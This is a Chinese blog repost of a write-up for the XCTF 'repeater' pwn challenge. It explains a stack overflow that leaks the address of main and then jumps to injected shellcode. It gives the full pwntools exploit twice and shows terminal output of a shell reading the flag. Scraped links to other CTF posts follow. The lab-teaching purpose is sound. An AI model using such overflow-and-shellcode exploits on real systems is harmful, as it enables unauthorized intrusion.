# repeater-攻防世界

最新推荐文章于 2024-07-21 08:53:04 发布
最新推荐文章于 2024-07-21 08:53:04 发布
阅读量381 收藏 1
点赞数
文章标签: python ubuntu 开发语言
原文链接:https://www.cnblogs.com/C0ngvv/p/16658316.html
版权
文章介绍了如何利用编程技巧在攻防世界的一个名为repeater的挑战中,通过编写特定的shellcode,控制输入溢出以改变程序流程,最终获取系统shell。过程中涉及了栈溢出、地址泄露和返回地址操纵等技术。
摘要由CSDN通过智能技术生成

repeater-攻防世界

image-20230401194705288

image-20230401194718188

text:0000000000000B04

from pwn import * 
sh = remote('61.147.171.105',65382)

context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
print(shellcode)
sh.sendlineafter('name :',shellcode)

num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()

giantbranch@ubuntu:~/Desktop/study$ python repeater3.py 
[+] Opening connection to 61.147.171.105 on port 65382: Done
[*] Switching to interactive mode
sorry... I can't.....
$ id
sh: 2: id: not found
$ ls
bin
dev
flag
lib
lib32
lib64
repeater
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to 61.147.171.105 port 65382
giantbranch@ubuntu:~/Desktop/study$ python repeater3.py 
[+] Opening connection to 61.147.171.105 on port 65382: Done
jhH\xb8/bin///sPH\x89�hri\x814$1�V^H�VH\x89�1�j;X\x0f\x05
[*] Switching to interactive mode
sorry... I can't.....
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$

ß参考:

本文作者: C0ngvv

本文链接: https://www.cnblogs.com/C0ngvv/p/16658316.html

关于博主: 评论和私信会在第一时间回复。或者直接私信我。

版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!

声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角**【推荐】**一下。

攻防世界 repeater 题解

查看程序保护情况,开启了PIE,没开NXRELRO全开。

img

在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:

  • 字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框)
  • 变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数组s空间后(见粉框)
  • 通过字符串s溢出可控制变量v5的值及函数返回地址
  • 程序运行起始可输入数据到内存BSS段(见蓝框)

img

根据这些信息,这道题的思路就出来了:

  1. 程序起始运行,提示输入name时,输入一段shellcode(将存储到byte_202040处)
  2. 通过字符串s溢出控制变量v5的值为3281697,从而泄露出main函数地址
  3. 通过main函数地址及byte_202040main地址偏移,获得shellcode代码地址
  4. 构造溢出输入,覆盖返回地址,使程序跳转到shellcode执行,获得系统shell

这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。

下面是这道题的完整代码:

from pwn import * 

sh = remote('61.147.171.105',50187)

# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)

# 通过输入内容溢出修改控制变量值,泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

# 再次通过输入内容溢出,将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()

执行结果如图:

img

[攻防世界 repeater 题解](

32进制
关注
攻防世界
handuoduo123的博客
12-05 975
攻防世界 新手题 misc 前5道 不得不说,这道题真的是入门级别了。答案就在题目中,复制粘贴就好 flag{th1s_!s_a_d4m0_4la9} 下载完题目是一张动态图隐约可以看到有个缺少定位符的二维码 隐约可以看到有个缺少定位符的二维码 利用PS把二维码补全(随意扣一张二维码的定位符就好了) 工具扫描得到flag{e7d478cf6b915f50ab1277f78502a2c5} 下载...
CTF--攻防世界Web新手训练7-12
qq_40730029的博客
04-28 2029
7.simple_php 8.get_post 9.xff_referer 11.command_execution 12.simple_js 7.simple_php 题目:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 进入场景之后看到php代码,我们只需通过get方式将满足条件的a,b值输入在地址栏即可拿到flag flag如下: Cyberpeace{647E37...
repeater攻防世界
qq_41696518的博客
09-01 1768
repeater 攻防世界
攻防世界WEB(新手模式)10-disabled_button
最新发布
你好
07-21 207
那么我们只需要删除这个属性就ok(把disabled这几个字母删除就ok,双击这个单词然后就可以删除了)点击f12查看,发现input被设置成了disabled属性。接下来回到题目,发现按钮可以点击了,直接出flag。点进去之后,确实诶,有个按钮但是点不动。题目给的提示:前端、按钮。
攻防世界--game
weixin_30876945的博客
08-17 1228
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074 1.准备 打开测试用例 首先分析程序 得到是win32程序 2.第一种方法 2.1 分析代码 使用IDA打开,找到main函数,F5得到C代码 得知主要是...
攻防世界-view_source
MateSnake的博客
12-22 152
攻防世界-view_source
攻防世界repeater
08-31
- *2* [repeater攻防世界】](https://blog.csdn.net/qq_41696518/article/details/126650028)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
攻防世界 WEB
BvxiE的博客
02-11 1188
攻防世界 新手区 WEBview sourcerobots​​​​backup功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 view source 查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了,那就F12吧!​ 或
攻防世界-web高手进阶区
zji
04-25 6525
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
如何搭建博客
Hyggn的博客
12-02 244
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 </@[TOC] ## 0x01注册一个GitHub账号,并登录 0X02创建属于自己的仓库 ** (1)点击New ![在这里插入图片描述 (2)填写自己的仓库名“用户名。github.io”,用户名要一致,否则会报错 0x03 启用Github Pages 1,点击"Setting"进入设置 2,找到“GitHub Pages” 0x04 下载安装Git和node.js 1,安装并配置Node.js,打开cmd命令,如图所示,便为成
攻防世界 Web xff_referer
Emjl__的博客
05-10 1580
题目描述中说道 xff 和 referer 是可以伪造的。而这道题中我们就来伪造这二者。 X-Forward-For(xff)是客户端连接到网页的ip,referer是客户从哪个网页来访问的当前页面。 打开 burp suite ,对网页抓包,发送给重发器(repeater)。 要求 ip 为123.123.123.123,就在请求中添加 X-Forwarded-For: 123.123.123.123 发送。 审查响应,发现要求客户从https://www.google.com发起请求。
攻防世界(MISC)
weixin_41687259的博客
05-09 345
stegano 菜狗收到了图后很开心,玩起了pdf 提交格式为flag{xxx},解密字符需小写。
攻防世界 -EasyRe
qq_51303140的博客
03-27 430
查壳 无壳放入IDA 通过输出right判断出关键代码,查看比较的字符串值 写脚本得到flag key = [120, 73, 114, 67, 106, 126, 60, 114, 124, 50, 116, 87, 115, 118, 51, 80, 116, 73, 0x7f, 0x7a, 0x6e, 0x64, 0x6b,0x61] key.reverse() #逆序排序key flag = [0 for i in range(len(key))] for i in ..
攻防世界 - NewsCenter - WriteUp
热门推荐
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界-EasyRE
qq_70851535的博客
11-13 669
逆向题目分析
攻防世界(新手篇)
sjt670994562的博客
06-02 1万+
作为刚刚进入reserve的小白,这几天在攻防世界的一些解题 no_strings_attached 一看没有exe,估计是linux的文件了,扔进C32Asm里 果然elf文件 先用扔进ida分析,发现主要函数authenticate,找到他的地址 OK,接下来就是扔到linux的gdb里面分析啦(这里我用的是peda显示的更方便点) 用b来下断点,b*0x08048708,然后r运行,n单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值